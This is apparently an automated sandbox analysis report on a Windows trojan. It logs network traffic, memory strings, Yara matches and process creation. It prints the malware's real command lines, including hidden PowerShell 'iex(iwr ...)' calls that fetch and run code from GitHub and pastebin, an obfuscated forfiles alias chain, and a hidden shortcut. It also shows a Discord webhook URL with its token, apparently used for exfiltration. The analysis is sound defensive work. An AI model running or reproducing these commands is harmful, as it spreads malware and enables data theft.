Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 14:01:20 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1729000882x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=58B81X6XqTUALdaBPuB4CfjF62tBh2T0Sr80DNIqWF0vD33om5w65U%2B1ZoHFRUyaIQLxuxnEnHXXFUzgKDsk3wi%2FcXAmwm483Ymcd3W5z8wNY0GD4JvymBTg3vnt"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=c2021c9f6a79cf8578cacfe5f6ac2dc95557f6e5-1729000880; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=F0CDxSPHlGiABYxlu8vUvaOxRpKPK93DuSrUk_klzrI-1729000880780-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d3057304f4d143f-DFW
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 14:01:33 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1729000895x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ff0O17UB3Ov3KTZmhUISKgZci0UZGNxr8qZ2cdsp%2BKOtY1dKXzn4%2F8MfuzKP4FZAf9cRxS9fA5hleR5PcSqyo83FD6mG%2FNLGtrsuNdDyDiYP6m2NnO7fzKzs2SIV"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=d9dc4083431ce817dfbc35ac79b778c84967b3e6-1729000893; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=T8QA7EP1FFG0VuusfKDGu21WWqvSlHvJJ.YAY7ZCz3k-1729000893944-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d30578259c74761-DFW
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 14:01:42 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1729000903x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1WJRR4H3K2KLLgXbDWi7%2BRVDgprYviDKr3%2BaAafST2985oEVwmhp91vSVx1TAAfQpa8oI7eXDu46chZ%2FmIKZI1DmY%2FkZnf027A7xgT4J0510P%2FMSwyWeaRV1UEpF"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=fbd1557a38fcd621c012b0decde5f8af2ef4fff2-1729000902; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=Ezu6upK7b7Q.YbiuCSJWjKSjGNCEhRlEZ00le.X7ekw-1729000902110-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d3057b57f8f475c-DFW
Source: powershell.exe, 0000000B.00000002.3233396001.000001E839107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://discord.com
Source: powershell.exe, 0000000B.00000002.3233396001.000001E8386D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3233396001.000001E8386B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3233396001.000001E838166000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
Source: powershell.exe, 0000000B.00000002.3233396001.000001E838166000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 0000000B.00000002.3233396001.000001E838753000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3233396001.000001E838784000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 0000000B.00000002.3233396001.000001E838753000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: powershell.exe, 0000000B.00000002.3233396001.000001E837CA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000B.00000002.3233396001.000001E837CA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3233396001.000001E837CBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000B.00000002.3233396001.000001E839107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com
Source: powershell.exe, 0000000B.00000002.3233396001.000001E839107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/128545359042878
Source: powershell.exe, 0000000B.00000002.3233396001.000001E8387EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQ
Source: powershell.exe, 0000000B.00000002.3233396001.000001E8387EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3233396001.000001E839107000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3233396001.000001E8386F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_
Source: powershell.exe, 0000000B.00000002.3233396001.000001E838166000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 0000000B.00000002.3233396001.000001E8386C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
Source: powershell.exe, 0000000B.00000002.3233396001.000001E8386C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3233396001.000001E8386B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 0000000B.00000002.3233396001.000001E8386FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 0000000B.00000002.3233396001.000001E8386FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3233396001.000001E8386D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.9:49763 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.9:49856 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.9:49869 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.9:49868 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.9:49905 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.9:49916 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.9:49943 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.9:49984 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: amsi64_7328.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_7368.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7328, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Users\user\Desktop\OSLdZanXNc.exeCode function: 0_2_00007FF68EF315300_2_00007FF68EF31530
Source: C:\Users\user\Desktop\OSLdZanXNc.exeCode function: 0_2_00007FF68EF38B600_2_00007FF68EF38B60
Source: C:\Users\user\Desktop\OSLdZanXNc.exeCode function: 0_2_00007FF68EF362B00_2_00007FF68EF362B0
Source: C:\Users\user\Desktop\OSLdZanXNc.exeCode function: 0_2_00007FF68EF379B00_2_00007FF68EF379B0
Source: C:\Users\user\Desktop\OSLdZanXNc.exeCode function: 0_2_00007FF68EF33AC00_2_00007FF68EF33AC0
Source: C:\Users\user\Desktop\OSLdZanXNc.exeCode function: 0_2_00007FF68EF310E00_2_00007FF68EF310E0
Source: C:\Users\user\Desktop\OSLdZanXNc.exeCode function: 0_2_00007FF68EF35BF00_2_00007FF68EF35BF0
Source: C:\Users\user\Desktop\OSLdZanXNc.exeCode function: 0_2_00007FF68EF32EF00_2_00007FF68EF32EF0
Source: C:\Users\user\Desktop\OSLdZanXNc.exeCode function: 0_2_00007FF68EF37C000_2_00007FF68EF37C00
Source: C:\Users\user\Desktop\OSLdZanXNc.exeCode function: 0_2_00007FF68EF333200_2_00007FF68EF33320
Source: C:\Users\user\Desktop\OSLdZanXNc.exeCode function: 0_2_00007FF68EF334300_2_00007FF68EF33430
Source: C:\Users\user\Desktop\OSLdZanXNc.exeCode function: 0_2_00007FF68EF38C300_2_00007FF68EF38C30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF88797C70211_2_00007FF88797C702
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF88797B95611_2_00007FF88797B956
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF887970FB511_2_00007FF887970FB5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF8879737E811_2_00007FF8879737E8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF887971FF511_2_00007FF887971FF5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF887A48BAA11_2_00007FF887A48BAA
Source: amsi64_7328.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_7368.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7328, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal88.troj.evad.winEXE@21/16@3/3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7744:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7520:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wnrk4m3e.eir.ps1Jump to behavior
Source: OSLdZanXNc.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\OSLdZanXNc.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\OSLdZanXNc.exe "C:\Users\user\Desktop\OSLdZanXNc.exe"
Source: C:\Users\user\Desktop\OSLdZanXNc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\OSLdZanXNc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Users\user\Desktop\OSLdZanXNc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Users\user\Desktop\OSLdZanXNc.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\OSLdZanXNc.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\OSLdZanXNc.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
